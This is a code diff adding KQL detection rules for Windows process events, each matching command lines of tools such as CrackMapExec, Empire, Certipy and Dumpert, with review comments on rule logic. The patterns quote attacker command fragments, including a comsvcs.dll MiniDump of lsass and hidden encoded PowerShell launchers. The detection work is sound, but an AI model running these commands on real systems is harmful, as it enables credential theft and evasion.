@@ -0,0 +1,10 @@ +// Title: Gpresult Display Group Policy Information +// Author: frack113 +// Date: 2022-05-01 +// Level: medium +// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1615 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/gpscript_execution.kql b/KQL/rules/windows/process_creation/gpscript_execution.kql new file mode 100644 index 00000000..cb2b5d51 --- /dev/null +++ b/KQL/rules/windows/process_creation/gpscript_execution.kql @@ -0,0 +1,12 @@ +// Title: Gpscript Execution +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate uses of logon scripts distributed via group policy + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql b/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql new file mode 100644 index 00000000..96e5944c --- /dev/null +++ b/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql 
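Review bot: The parent exclusion in the gpscript rule, `not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc")`, is an exact match, so a host whose system drive is not C: or a sensor that reports the path quoted slips past it and the legitimate Group Policy service launch alerts. Anchoring on the invariant tail is more robust: `not(InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s gpsvc")`. The ` /logon`/` /startup` gate on gpscript.exe is unaffected by this change.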
@@ -0,0 +1,10 @@ +// Title: Greedy File Deletion Using Del +// Author: frack113 , X__Junior (Nextron Systems) +// Date: 2021-12-02 +// Level: medium +// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql new file mode 100644 index 00000000..fae44daf --- /dev/null +++ b/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql @@ -0,0 +1,10 @@ +// Title: Group Membership Reconnaissance Via Whoami.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql b/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql new file mode 100644 index 00000000..746643db --- /dev/null +++ b/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql @@ -0,0 +1,12 @@ +// Title: Gzip Archive Decode Via PowerShell +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: medium +// Description: Detects attempts of decoding encoded Gzip archives via PowerShell. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1132.001 +// False Positives: +// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions + +DeviceProcessEvents +| where ProcessCommandLine contains "GZipStream" and ProcessCommandLine contains "::Decompress" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql new file mode 100644 index 00000000..48597c07 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - ADCSPwn Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-31 +// Level: high +// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1557.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port " \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql new file mode 100644 index 00000000..2b40985d --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Bloodhound/Sharphound Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-20 +// Level: high +// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 +// False Positives: +// - Other programs that use these command line option and accepts an 'All' parameter + +DeviceProcessEvents +| where (ProcessCommandLine contains " -CollectionMethod All " or ProcessCommandLine contains " --CollectionMethods Session " or ProcessCommandLine contains " --Loop --Loopduration " or ProcessCommandLine contains " --PortScanTimeout " or ProcessCommandLine contains ".exe -c All -d " or ProcessCommandLine contains "Invoke-Bloodhound" or ProcessCommandLine contains "Get-BloodHoundData") or (ProcessCommandLine contains " -JsonFolder " and ProcessCommandLine contains " -ZipFileName ") or (ProcessCommandLine contains " DCOnly " and ProcessCommandLine contains " --NoSaveCache ") or (ProcessVersionInfoProductName contains "SharpHound" or ProcessVersionInfoFileDescription contains "SharpHound" or (ProcessVersionInfoCompanyName contains "SpecterOps" or ProcessVersionInfoCompanyName contains "evil corp") or (FolderPath contains "\\Bloodhound.exe" or FolderPath contains "\\SharpHound.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_certify_execution.kql b/KQL/rules/windows/process_creation/hacktool_certify_execution.kql new file mode 100644 index 00000000..d76e0175 
--- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_certify_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Certify Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 + +DeviceProcessEvents +| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql b/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql new file mode 100644 index 00000000..36cbf366 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql 
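Review bot: `ProcessVersionInfoFileDescription contains "Certify"` stands alone in the first OR group, so any binary whose description contains that word fires the rule with nothing else narrowing it; unrelated certificate-management software can plausibly carry such a description, and the rule is labelled high. This hunk is also one of the headers without a `// False Positives:` section, so if the upstream rule keeps this term the header should at least warn about it, e.g. `// - Legitimate software whose file description contains "Certify"`. The command-line group (`.exe find ` etc. combined with `/vulnerable`, `/template:` and friends) is specific enough on its own.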
@@ -0,0 +1,12 @@ +// Title: HackTool - Certipy Execution +// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak +// Date: 2023-04-17 +// Level: high +// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " account " or ProcessCommandLine contains " auth " or ProcessCommandLine contains " cert " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " ptt " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow " or ProcessCommandLine contains " template ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -template" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql b/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql new file mode 100644 index 00000000..f458c6e7 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - Covenant PowerShell Launcher +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2020-06-04 +// Level: high +// Description: Detects suspicious command lines used in Covenant luanchers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql new file mode 100644 index 00000000..a86b278f --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql 
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
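Review bot: The last alternative requires one command line to contain `" 10."`, `" 192.168."` and `"/24 "` all at once, which a single CrackMapExec invocation will practically never satisfy, so that selection is dead code. The three target patterns read as an alternative list (either private range, or a /24 suffix), and unless the upstream selection really demands all three the `and`s between them should be `or`s: `(ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains "/24 ")`. It is worth checking how the converter handles a plain `contains` list sitting next to a `contains|all` list in the same selection, since the same shape may be mis-translated in other generated rules.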
diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql new file mode 100644 index 00000000..bceef24b --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql @@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec Execution Patterns +// Author: Thomas Patzke +// Date: 2020-05-22 +// Level: high +// Description: Detects various execution patterns of the CrackMapExec pentesting framework +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106 + +DeviceProcessEvents +| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc " \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql new file mode 100644 index 00000000..633db41a --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql 
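Review bot: In the first two alternatives the two `ProcessCommandLine contains "\\"` terms contribute nothing: a single backslash occurs in practically every Windows command line that names a path, and the term is repeated verbatim. The discriminating parts are `"cmd.exe /Q /c "`, `" 1> \\"` and `" 2>&1"`; if the upstream pattern was a UNC output path (something like ` 1> \\<host>\share\`), it looks as though the converter split it into fragments, and the prefix should be restored as one string, e.g. `ProcessCommandLine contains " 1> \\\\"`. Either drop the redundant terms or restore the original substrings so the rule matches what it claims to.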
@@ -0,0 +1,10 @@ +// Title: HackTool - CrackMapExec PowerShell Obfuscation +// Author: Thomas Patzke +// Date: 2020-05-22 +// Level: high +// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql new file mode 100644 index 00000000..8ba0548f --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql 
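Review bot: The first alternative, `ProcessCommandLine contains "join" and ProcessCommandLine contains "split"`, matches any powershell/pwsh command line that uses both `-join` and `-split`, which is routine in administrative scripting, yet the rule is labelled high and the header has no False Positives section. If the upstream rule really carries this as a standalone selection, the header should warn about it, e.g. `// - Administrative scripts that use -join and -split on the command line`; otherwise the term should be tightened to the concrete obfuscation shapes the remaining alternatives describe (`$ShellId[1]+$ShellId[13]+'x'` and the like). The image gate on powershell.exe/pwsh.exe does not reduce this noise, since that is exactly where such scripts run.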
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-12
+// Level: high
+// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql
new file mode 100644
index 00000000..62e06e69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql
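Review bot: `AccountName contains "AUTHORI"` / `"AUTORI"` is meant to catch a SYSTEM context (NT AUTHORITY\SYSTEM and its localized spellings), but in DeviceProcessEvents the authority part is carried in `AccountDomain` while `AccountName` holds only the user, so this term is unlikely to ever match and the whole first alternative is effectively disabled. Match on the domain column instead: `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")`. The comsvcs MiniDump and `tasklist /v /fo csv` alternatives do not depend on the user field and are unaffected.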
@@ -0,0 +1,12 @@ +// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation +// Author: Markus Neis, @Karneades +// Date: 2018-03-06 +// Level: high +// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "/SC ONLOGON" or ProcessCommandLine contains "/SC DAILY /ST" or ProcessCommandLine contains "/SC ONIDLE" or ProcessCommandLine contains "/SC HOURLY") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "powershell.exe -NonI" and ProcessCommandLine contains "/TN Updater /TR") and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql new file mode 100644 index 00000000..c43dbd26 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - DInjector PowerShell Cradle Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-07 +// Level: critical +// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql
new file mode 100644
index 00000000..42b6687c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Dumpert Process Dumper Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceProcessEvents
+| where MD5 startswith "09D278F9DE118EF09163C6140255C690" or ProcessCommandLine contains "Dumpert.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql b/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql
new file mode 100644
index 00000000..e22e42cd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - EDRSilencer Execution
+// Author: @gott_cyber
+// Date: 2024-01-02
+// Level: high
+// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer"
\ No newline at end of file
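Review bot: In the Dumpert rule, `MD5 startswith "09D278F9DE118EF09163C6140255C690"` compares a full 32-character hash with a prefix operator; it works only because the prefix happens to be the whole value, and it reads as if a truncated hash were intended. `MD5 =~ "09D278F9DE118EF09163C6140255C690"` states the exact match that is meant. The hash also pins a single build, so a recompiled Dumpert is caught only by the `Dumpert.dll` command-line string; a header line such as `// Note: the hash covers one known build; rebuilt binaries are only caught by the DLL name` would make that limit visible to whoever triages a critical-level hit.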
diff --git a/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql new file mode 100644 index 00000000..10b139e8 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Empire PowerShell Launch Parameters +// Author: Florian Roth (Nextron Systems) +// Date: 2019-04-20 +// Level: high +// Description: Detects suspicious powershell command line parameters used in Empire +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other tools that incidentally use the same command line parameters + +DeviceProcessEvents +| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand " \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql new file mode 100644 index 00000000..aee6f0a8 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - Empire PowerShell UAC Bypass +// Author: Ecco +// Date: 2019-08-30 +// Level: critical +// Description: Detects some Empire PowerShell UAC bypass methods +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceProcessEvents +| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql b/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql new file mode 100644 index 00000000..0ef97169 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql @@ -0,0 +1,12 @@ +// Title: Hacktool Execution - PE Metadata +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoCompanyName =~ "Cube0x0" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql new file mode 100644 index 00000000..65e034c6 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - F-Secure C3 Load by Rundll32 +// Author: Alfie Champion (ajpc500) +// Date: 2021-06-02 +// Level: critical +// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql new file mode 100644 index 00000000..aaa0de88 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - GMER Rootkit Detector and Remover Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: high +// Description: Detects the execution GMER tool based on image and hash fields. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\gmer.exe" or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql new file mode 100644 index 00000000..d375b4e9 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - Hashcat Password Cracker Execution +// Author: frack113 +// Date: 2021-12-27 +// Level: high +// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1110.002 +// False Positives: +// - Tools that use similar command line flags and values + +DeviceProcessEvents +| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql b/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql new file mode 100644 index 00000000..0e972750 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql @@ -0,0 +1,11 @@ +// Title: HackTool - HollowReaper Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-01 +// Level: high +// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. +// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012 + +DeviceProcessEvents +| where FolderPath endswith "\\HollowReaper.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql b/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql new file mode 100644 index 00000000..fc4713e6 --- /dev/null +++ b/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql 
